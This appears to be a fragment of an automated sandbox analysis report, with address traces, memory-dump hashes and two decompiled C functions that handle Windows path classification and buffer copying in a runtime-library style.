0x034f60b3
0x034f60b6
0x034f60b8
0x034f60ba
0x034f60ba
0x034f60ba
0x034f60ba
0x034f60be
0x034f60c0
0x034f60c5
0x034f60c5
0x034f60c5
0x034f60c6
0x034f60cd
0x034f6114
0x034f60cf
0x034f60cf
0x034f60d4
0x034f60d5
0x034f60da
0x034f60db
0x034f60e1
0x034f60e2
0x034f60e8
0x034f60f8
0x034f60fd
0x034f60fe
0x034f6102
0x034f6104
0x034f6107
0x034f6109
0x034f610b
0x034f610b
0x034f610b
0x034f610b
0x034f610f
0x034f610f
0x034f6117
0x034f611a
0x034f611f
0x034f6125
0x034f6134
0x034f6139
0x034f613f
0x034f6146
0x034f6148
0x034f614b
0x034f614d
0x034f614f
0x034f614f
0x034f614f
0x034f614f
0x034f6153
0x034f6159
0x034f6159
0x034f615c
0x034f6163
0x034f6169
0x034f616c
0x034f6172
0x034f6181
0x034f6186
0x034f6187
0x034f618b
0x034f6191
0x034f6195
0x034f61a3
0x034f61bb
0x034f61c0
0x034f61c3
0x034f61cc
0x034f61d0
0x034f61dc
0x034f61de
0x034f61e1
0x034f61e4
0x034f61e6
0x034f61e8
0x034f61e8
0x034f61e8
0x034f61e8
0x034f61e6
0x034f61ec
0x034f61f3
0x034f6203
0x034f6209
0x034f620a
0x034f6216
0x034f621d
0x034f6227
0x034f6241
0x034f6246
0x034f624c
0x034f6257
0x034f6259
0x034f625c
0x034f625e
0x034f6260
0x034f6260
0x034f6260
0x034f6260
0x034f625e
0x034f6264
0x034f6267
0x034f6269
0x034f6315
0x034f6315
0x034f631b
0x034f631e
0x034f6324
0x034f6327
0x034f632f
0x034f6330
0x034f6333
0x034f633a
0x034f633c
0x034f6335
0x034f6335
0x034f6335
0x034f633f
0x034f6342
0x034f634c
0x034f6352
0x034f6355
0x034f6355
0x034f6359
0x00000000
0x034f626f
0x034f6275
0x034f6275
0x034f6278
0x034f627e
0x034f627e
0x034f6281
0x034f6287
0x034f628d
0x034f6298
0x034f629c
0x034f62a2
0x034f629e
0x034f629e
0x034f629e
0x034f62a7
0x034f62a7
0x034f62aa
0x034f62b0
0x034f62f0
0x034f62f0
0x034f62f2
0x034f62f8
0x034f62fd
0x034f62b2
0x034f62b2
0x034f62b2
0x034f62b5
0x034f62dd
0x034f62e2
0x034f62e5
0x034f62b7
0x034f62b8
0x034f62bb
0x034f62bd
0x034f62c0
0x034f62c4
0x034f62cd
0x034f62cd
0x034f62c0
0x034f62bb
0x034f62b5
0x034f6302
0x034f6303
0x034f6305
0x034f6305
0x034f6305
0x034f630c
0x034f630c
0x00000000
0x034f627e
0x034f6269
0x034f5eac
0x034f5ebb
0x034f5ebe
0x034f5ecb
0x034f5ecb
0x034f5ece
0x034f5ece
0x034f5ed4
0x034f5ed7
0x034f5ed9
0x034f5edb
0x034f5edb
0x034f5ee1
0x034f5ee1
0x034f5ee3
0x034f5f20
0x034f5f20
0x034f5ee5
0x034f5ee5
0x034f5ee5
0x034f5ee8
0x034f5f11
0x034f5f18
0x034f5eea
0x034f5eea
0x034f5eed
0x034f5ef2
0x034f5ef8
0x034f5efb
0x034f5f0a
0x034f5f0a
0x034f5eed
0x034f5ee8
0x034f5f22
0x034f5f28
0x00000000
0x00000000
0x034f5f30
0x034f5f31
0x034f5f37
0x034f5f3a
0x034f5f3d
0x034f5f44
0x00000000
0x00000000
0x00000000
0x034f5f46
0x034f5f48
0x034f5f4d
0x00000000
0x034f5f4d
0x034f5dda
0x034f5ddf
0x00000000
0x034f5ddf
0x034f5dd8
0x034f5da7
0x034f5da9
0x034f5dac
0x034f5dae
0x00000000
0x034f5db4
0x034f5db4
0x00000000
0x034f5db4
0x034f5dae
0x034f5d88
0x034f5d8d
0x034f6363
0x034f6369
0x034f636a
0x034f6370
0x034f6372
0x034f637a
0x034f637b
0x034f637d
0x00000000
0x00000000
0x034f637f
0x034f6385
0x00000000
0x034f6385
0x034f5d38
0x034f5d3b
0x00000000
0x00000000
0x00000000
0x034f5d3b
0x034f5d27
0x034f5d29
0x00000000
0x00000000
0x00000000
0x034f6360
0x00000000
0x034f6360
0x034f5c10
0x034f5c10
0x034f63da
0x034f63e5
0x034f63e5

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c339850f72e95b3516ceae99861a84e6e6d608bee8c417a6519a6436274706
Instruction ID: 6523df6229a4a83d74b4c587323216cb378cd0c71317d87456edea66483906ba
Opcode Fuzzy Hash: c4c339850f72e95b3516ceae99861a84e6e6d608bee8c417a6519a6436274706
Instruction Fuzzy Hash: 9F424875900229CFDB24CF68C880BAAB7B1FF49304F1981EAD95DAB342D7359A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03444120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E03444120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x351d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0345F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03446E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03444620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03446E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M034445F8))) {
												case 0:
													_v568 = 0x3401078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x34011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03444620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0346F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0346F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E034252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0343EB70(1, 0x35179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0343AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E034695D0();
																			L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0346B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03463D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0346B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x03444128
0x03444135
0x0344413c
0x03444141
0x03444145
0x03444147
0x0344414e
0x03444151
0x03444159
0x0344415c
0x03444160
0x03444164
0x03444168
0x0344416c
0x0344417f
0x03444181
0x0344446a
0x0344446a
0x0344418c
0x03444195
0x03444199
0x03444432
0x03444439
0x0344443d
0x03444442
0x03444447
0x00000000
0x0344419f
0x034441a3
0x034441b1
0x034441b9
0x034441bd
0x034445db
0x034445db
0x00000000
0x034441c3
0x034441c3
0x034441ce
0x034441d4
0x0348e138
0x0348e13e
0x0348e169
0x0348e16d
0x0348e19e
0x0348e16f
0x0348e16f
0x0348e175
0x0348e179
0x0348e18f
0x0348e193
0x00000000
0x0348e199
0x00000000
0x0348e199
0x0348e193
0x00000000
0x00000000
0x00000000
0x034441da
0x034441da
0x034441df
0x034441e4
0x034441ec
0x03444203
0x03444207
0x0348e1fd
0x03444222
0x03444226
0x0348e1f3
0x0348e1f3
0x0344422c
0x0344422c
0x03444233
0x0348e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03444239
0x03444239
0x03444239
0x03444239
0x03444233
0x03444226
0x034441ee
0x034441ee
0x034441f4
0x03444575
0x0348e1b1
0x0348e1b1
0x00000000
0x0344457b
0x0344457b
0x03444582
0x0348e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x03444588
0x03444588
0x0344458c
0x0348e1c4
0x0348e1c4
0x00000000
0x03444592
0x03444592
0x03444599
0x0348e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0344459f
0x0344459f
0x034445a3
0x0348e1d7
0x0348e1e4
0x00000000
0x034445a9
0x034445a9
0x034445b0
0x0348e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x034445b6
0x034445b6
0x034445b6
0x00000000
0x034445b6
0x034445b0
0x034445a3
0x03444599
0x0344458c
0x03444582
0x00000000
0x00000000
0x00000000
0x00000000
0x034441f4
0x0344423e
0x03444241
0x034445c0
0x034445c4
0x00000000
0x034445ca
0x034445ca
0x00000000
0x0348e207
0x0348e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x034445d1
0x00000000
0x00000000
0x034445ca
0x00000000
0x03444247
0x03444247
0x03444247
0x03444249
0x03444249
0x03444249
0x03444251
0x03444251
0x03444257
0x0344425f
0x0344426e
0x03444270
0x0344427a
0x0348e219
0x0348e219
0x03444280
0x03444282
0x03444456
0x034445ea
0x00000000
0x034445f0
0x0348e223
0x00000000
0x0348e223
0x0344445c
0x0344445c
0x00000000
0x0344445c
0x00000000
0x03444288
0x0344428c
0x0348e298
0x03444292
0x03444292
0x0344429e
0x034442a3
0x034442a7
0x034442ac
0x0348e22d
0x034442b2
0x034442b2
0x034442b9
0x034442bc
0x034442c2
0x034442ca
0x034442cd
0x034442cd
0x034442d4
0x0344433f
0x0344433f
0x034442d6
0x034442d6
0x034442d9
0x034442dd
0x034442eb
0x0348e23a
0x034442f1
0x03444305
0x0344430d
0x03444315
0x03444318
0x0344431f
0x03444322
0x0344432e
0x0344433b
0x0344433b
0x00000000
0x0344432e
0x034442eb
0x0344434c
0x0344434e
0x03444352
0x03444359
0x0344435e
0x03444361
0x0344436e
0x0344438a
0x0344438e
0x03444396
0x0344439e
0x034443a1
0x034443ad
0x034443bb
0x034443bb
0x034443ad
0x0344436e
0x034443bf
0x034443c5
0x03444463
0x03444463
0x034443ce
0x034443d5
0x034443d9
0x034443df
0x03444475
0x03444479
0x03444491
0x03444491
0x03444479
0x034443e5
0x034443eb
0x034443f4
0x034443f6
0x034443f9
0x034443fc
0x034443ff
0x034444e8
0x034444ed
0x034444f3
0x0348e247
0x00000000
0x034444f9
0x03444504
0x03444508
0x0344450f
0x0348e269
0x00000000
0x03444515
0x03444519
0x03444531
0x03444534
0x03444537
0x0344453e
0x03444541
0x0344454a
0x0348e255
0x0348e255
0x0348e25b
0x0348e25e
0x0348e261
0x0348e261
0x03444555
0x03444559
0x0344455d
0x0348e26d
0x0348e270
0x0348e274
0x0348e27a
0x0348e27d
0x0348e28e
0x0348e28e
0x03444563
0x03444563
0x03444569
0x03444569
0x00000000
0x0344455d
0x0344450f
0x00000000
0x034444f3
0x034443ff
0x03444405
0x03444405
0x03444405
0x034442ac
0x0344428c
0x03444282
0x03444407
0x0344440d
0x0348e2af
0x0348e2af
0x03444413
0x03444413
0x00000000
0x034441d4
0x00000000
0x034441c3
0x034441bd
0x03444415
0x03444415
0x03444416
0x03444417
0x03444429
0x0344416e
0x0344416e
0x03444175
0x03444498
0x0344449f
0x0348e12d
0x00000000
0x0348e133
0x00000000
0x0348e133
0x034444a5
0x034444a5
0x034444aa
0x00000000
0x034444bb
0x034444ca
0x034444d6
0x034444d7
0x034444d8
0x034444e3
0x034444e3
0x034444aa
0x0344417b
0x0344417b
0x0344417b
0x00000000
0x0344417b
0x03444175
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13fc435168bd9a6e478488ee5b1e51b9b98e10a283c6bead0f1880f1345f6540
Instruction ID: 464bf6836a296bb5de436345a354fc524eeadf14d11e548e9d19838982a14c29
Opcode Fuzzy Hash: 13fc435168bd9a6e478488ee5b1e51b9b98e10a283c6bead0f1880f1345f6540
Instruction Fuzzy Hash: 65F16B746082118BD724DF5AC480A3BB7E1BF88744F58496FF8968F350E734D886CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 034520A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E034520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3518714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03452EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03452EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E034258EC(_t240);
									_t221 =  *0x3515cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3515cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03464A2C(0x3516e40, 0x3464b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03447D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3405c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0345F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0345F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E034A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03442400(_t267 + 0x20);
															}
															L03442400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03452397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03442280(_t134, 0x3518608);
									__eflags =  *0x3516e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0343FFB0(_t198, _t241, 0x3518608);
										__eflags = _t253;
										if(_t253 != 0) {
											L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3516e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
